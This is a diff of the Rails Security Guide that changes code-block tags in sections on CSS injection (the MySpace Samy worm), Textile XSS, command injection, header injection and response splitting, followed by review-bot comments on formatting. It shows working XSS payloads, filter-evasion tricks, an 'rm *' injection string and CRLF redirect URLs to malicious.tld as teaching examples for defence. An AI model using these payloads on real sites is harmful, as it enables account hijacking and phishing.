The filter is applied only once, however, so the onload attribute with the worm code stays in place. This is a good example why blacklist filters are never complete and why it is hard to allow HTML/JavaScript in a web application. @@ -800,27 +800,27 @@ CSS Injection is explained best by a well-known worm, the "MySpace Samy worm":ht MySpace blocks many tags, however it allows CSS. So the worm's author put JavaScript into CSS like this: -<pre> +<html> <div style="background:url('javascript:alert(1)')"> -</pre> +</html> So the payload is in the style attribute. But there are no quotes allowed in the payload, because single and double quotes have already been used. But JavaScript allows has a handy eval() function which executes any string as code. -<pre> +<html> <div id="mycode" expr="alert('hah!')" style="background:url('javascript:eval(document.all.mycode.expr)')"> -</pre> +</html> The eval() function is a nightmare for blacklist input filters, as it allows the style attribute to hide the word “innerHTML”: -<pre> +<plain> alert(eval('document.body.inne' + 'rHTML')); -</pre> +</plain> The next problem was MySpace filtering the word “javascript”, so the author used “java<NEWLINE>script" to get around this: -<pre> +<html> <div id="mycode" expr="alert('hah!')" style="background:url('java↵
script:eval(document.all.mycode.expr)')"> -</pre> +</html> Another problem for the worm's author were CSRF security tokens. Without them he couldn't send a friend request over POST. He got around it by sending a GET to the page right before adding a user and parsing the result for the CSRF token. @@ -839,24 +839,24 @@ h4. Textile Injection For example, RedCloth translates +_test_+ to <em>test<em>, which makes the text italic. However, up to the current version 3.0.4, it is still vulnerable to XSS. Get the "all-new version 4":http://www.redcloth.org that removed serious bugs. However, even that version has "some security bugs":http://www.rorsecurity.info/journal/2008/10/13/new-redcloth-security.html, so the countermeasures still apply. Here is an example for version 3.0.4: -<pre> ->> RedCloth.new('<script>alert(1)</script>').to_html -=> "<script>alert(1)</script>" -</pre> +<ruby> +RedCloth.new('<script>alert(1)</script>').to_html +# => "<script>alert(1)</script>" +</ruby> Use the :filter_html option to remove HTML which was not created by the Textile processor. -<pre> ->> RedCloth.new('<script>alert(1)</script>', [:filter_html]).to_html -=> "alert(1)" -</pre> +<ruby> +RedCloth.new('<script>alert(1)</script>', [:filter_html]).to_html +# => "alert(1)" +</ruby> However, this does not filter all HTML, a few tags will be left (by design), for example <a>: -<pre> ->> RedCloth.new("<a href='javascript:alert(1)'>hello</a>", [:filter_html]).to_html -=> "<p><a href="javascript:alert(1)">hello</a></p>" -</pre> +<ruby> +RedCloth.new("<a href='javascript:alert(1)'>hello</a>", [:filter_html]).to_html +# => "<p><a href="javascript:alert(1)">hello</a></p>" +</ruby> h5. Countermeasures 
@@ -882,10 +882,10 @@ If your application has to execute commands in the underlying operating system, A countermeasure is to _(highlight)use the +system(command, parameters)+ method which passes command line parameters safely_. -<pre> +<ruby> system("/bin/echo","hello; rm *") # prints "hello; rm *" and does not delete files -</pre> +</ruby> h4. Header Injection 
@@ -896,30 +896,30 @@ HTTP request headers have a Referer, User-Agent (client software), and Cookie fi Besides that, it is _(highlight)important to know what you are doing when building response headers partly based on user input._ For example you want to redirect the user back to a specific page. To do that you introduced a “referer“ field in a form to redirect to the given address: -<pre> +<ruby> redirect_to params[:referer] -</pre> +</ruby> What happens is that Rails puts the string into the Location header field and sends a 302 (redirect) status to the browser. The first thing a malicious user would do, is this: -<pre> +<plain> http://www.yourapplication.com/controller/action?referer=http://www.malicious.tld -</pre> +</plain> And due to a bug in (Ruby and) Rails up to version 2.1.2 (excluding it), a hacker may inject arbitrary header fields; for example like this: -<pre> +<plain> http://www.yourapplication.com/controller/action?referer=http://www.malicious.tld%0d%0aX-Header:+Hi! http://www.yourapplication.com/controller/action?referer=path/at/your/app%0d%0aLocation:+http://www.malicious.tld -</pre> +</plain> Note that "%0d%0a" is URL-encoded for "\r\n" which is a carriage-return and line-feed (CRLF) in Ruby. So the resulting HTTP header for the second example will be the following because the second Location header field overwrites the first. -<pre> +<plain> HTTP/1.1 302 Moved Temporarily (...) Location: http://www.malicious.tld -</pre> +</plain> So _(highlight)attack vectors for Header Injection are based on the injection of CRLF characters in a header field._ And what could an attacker do with a false redirection? He could redirect to a phishing site that looks the same as yours, but asks to login again (and sends the login credentials to the attacker). Or he could install malicious software through browser security holes on that site. Rails 2.1.2 escapes these characters for the Location field in the +redirect_to+ method. 
_(highlight)Make sure you do it yourself when you build other header fields with user input._ @@ -927,7 +927,7 @@ h5. Response Splitting If Header Injection was possible, Response Splitting might be, too. In HTTP, the header block is followed by two CRLFs and the actual data (usually HTML). The idea of Response Splitting is to inject two CRLFs into a header field, followed by another response with malicious HTML. The response will be: -<pre> +<plain> HTTP/1.1 302 Found [First standard 302 response] Date: Tue, 12 Apr 2005 22:09:07 GMT Location:
Content-Type: text/html @@ -942,7 +942,7 @@ Keep-Alive: timeout=15, max=100 shown as the redirected page] Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html -</pre> +</plain> Under certain circumstances this would present the malicious HTML to the victim. However, this seems to work with Keep-Alive connections, only (and many browsers are using one-time connections). But you can't rely on this. _(highlight)In any case this is a serious bug, and you should update your Rails to version 2.0.5 or 2.1.2 to eliminate Header Injection (and thus response splitting) risks._ |
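Review bot: In the 2_3_release_notes.textile hunk at @@ -146, the "More Information" sub-items are written with a leading " - ", which Textile does not treat as a nested bullet, so they will render as plain text under the "* More Information:" item; use "** " for the two nested entries so they render as a sub-list.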
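Review bot: In the caching_with_rails.textile hunk at @@ -500, the second reference still carries the title "RailsEnvy, Rails Caching Tutorial, Part 1" while its URL ends in "ruby-on-rails-caching-tutorial-part-2"; since the hunk already touches these lines to strip the indentation, fix the title to "Part 2" in the same change.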
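Review bot: In the index.erb.textile hunk at @@ -73, the relocated "Rails on Rack" entry drops the ":ticket => 58" argument that the old entry at @@ -109 had; if that argument marks a guide as still being reviewed, confirm the drop is intended and not lost in the move.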
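Review bot: In the index.erb.textile hunk at @@ -109, the new "Caching with Rails" description "Various caching techniques provided by Rails." is a fragment, while every neighbouring entry is a full sentence of the form "This guide covers ..."; reword it to match, e.g. "This guide covers the various caching techniques provided by Rails."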
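Review bot: In the security.textile hunk at @@ -264, the example URL inside the new <plain> block reads "param1=xy¶m2=23&host=www.attacker.com", i.e. the "&param2" has been rendered as a pilcrow because "&para" is a valid HTML entity; check that the generated guide escapes the ampersand in <plain> blocks (or write "&amp;param2" in the source) so the reader sees the intended "&param2=23".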
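Review bot: In the security.textile hunk at @@ -599, the prose says the user enters "' OR 1=1'" but the resulting query shown in the new <sql> block is "... WHERE name = '' OR 1 --'", which would come from the input "' OR 1 --" instead; since the hunk rewrites this block anyway, make the input and the query agree (the "--" comment variant matches the sentence that follows about the two dashes).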
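Review bot: In the security.textile hunk at @@ -686, the block holding "<script>document.write(document.cookie);</script>" is tagged <plain>, whereas the structurally identical "<script>document.write('<img src=...')</script>" block just below it and the earlier alert examples are tagged <html>; use <html> for this one too so the whole section gets the same highlighting and escaping.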
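Review bot: In the security.textile hunk at @@ -765, the obfuscated vector "<IMG SRC=&#106;&#97;...>" is now inside an <html> block; the point of the example is that the payload is entity-encoded, so confirm the guide generator emits those "&#NNN;" sequences literally rather than decoding them to "javascript:alert('XSS')", otherwise the rendered example no longer illustrates the encoding trick the paragraph describes.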
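Review bot: In the security.textile hunk at @@ -839, converting the irb transcript to "# =>" comments leaves the third example as "# => "<p><a href="javascript:alert(1)">hello</a></p>"", which is not what irb would print: inspect output escapes the inner double quotes as \", so either keep the \" escapes in the comment or show the value as a single-quoted string so the comment reads as real output.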